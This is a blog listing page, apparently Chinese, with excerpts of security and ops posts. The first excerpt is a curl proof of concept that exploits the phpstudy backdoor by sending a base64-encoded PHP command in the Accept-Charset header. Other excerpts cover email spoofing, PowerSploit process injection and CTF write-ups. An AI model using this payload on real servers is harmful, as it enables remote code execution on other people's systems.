原创 【POC】phpstudy官方隱藏後門poc

  curl http://localhost/1.php -H 'Accept-Encoding:gzip,deflate' -H 'Accept-Charset:ZWNobyBgaXBjb25maWdgOw=='  可插入任意ph

原创 【F2C】git常見命令

說明 本篇內容是博主在學習工作過程中常常用到的一些git操作命令,可作爲一個參考手冊用,畢竟命令這麼多也記不住。同時也記錄了踩過的一些坑-_-! 以後有時間會整理對git的理解以及正確的使用方法,咕咕咕 參考 Git使用方法 Gi

原创 【ERROR】KALI web服務器訪問提示You don't have permission to access xxx on this server.

碰到的情況是,部分可以訪問,部分不能訪問。 應該是因爲文件權限問題。一看果然。 給個r權限 chmod a+r *.* over

原创 【F2C】利用郵件頭欺騙進行電子郵件僞造

參考地址← 備用地址← 郵件日誌分析 郵件僞造方法(telnet) 郵件僞造方法(Swaks) received的類型 郵件協議和日誌詳細分析 待研究:指定郵箱服務器發送郵件,郵件收件人不存在在該郵箱服務器記錄中,郵件會轉發到實際

原创 【EXP】利用powersploit實現進程注入

實驗內容 實驗名稱 利用powersploit實現進程注入 實驗環境 靶機:windows7,主機名target 攻擊機:  宿主機:macOS,主機名host  虛擬機:kali,主機名vmhost 使用工具: metasploit:製

原创 一圖搞懂flink中的滑動窗口與滾動窗口

一圖解決問題: 雙橫線是事件流,單橫線是窗口(這裏用事件窗口) 事件窗口大小是5根槓槓。 滾動窗口處理完要用4次,滑動用n多次 同一事件不會出現在同一個滾動窗口中,但是可能在多個滑動窗口中(嘖嘖,腳踏兩條船)

原创 【kali】terminal終端字體放大縮小

文章目錄放大恢復初始 對老花眼還挺友好的…… 原始 放大 ctrl+shift++ 恢復初始 ctrl+0

原创 【F2C】NCTF 南郵攻防平臺 Write Up

說在前面 大部分參考:NCTF 南京郵電大學網絡攻防訓練平臺 WriteUp 做題網址:CG-CTF (裏面時不時出現某同學的名字實在好出戲啊!) 裏面只有web。解答比較全,不過我有幾題沒寫出來,以後做出來了會更新。另外也有非w

原创 【ERROR】curl下載文件並保留文件名

curl下載文件的時候如果遇到 www.xxxx.com?id=123這種類型的網址,在下載文件的時候使用 -O 參數,下載的文件名會是id=123。網上查了很久發現還有一個參數 -J 可以保留文件名,應該是取了Content-Type中

原创 【F2C】hacker101 writeup(更新中)

Hacker101練習地址 目錄Petshop Proflag1PostBookflag0flag get#flag1flag2flag3flag4flag5 一些參考: https://www.anquanke.com/post

原创 【F2C】elasticsearc/elk/es——複製粘貼索引內容/重命名索引

es需要重命名索引時,最直接的辦法是將需要更名的索引內容複製粘貼到一個新的索引中 POST localhost:9200/_reindex { "source": { "index": "old_indexName"

原创 【F2C】用repository-hdfs將elasticsearch的索引備份到hdfs

最近在研究ELK,隨手寫點筆記心得,新手新手 ============================================== 參考了這篇文章的 http://bigbo.github.io/pages/2015/02/28/

原创 【F2C】elasitcsearch/ELK學習隨筆——X-PACK身份驗證

最近在研究ELK,隨手寫點筆記心得,新手新手 ========================================================== elasticsearch安裝X-PACK之後會需要使用密碼認證,初始用戶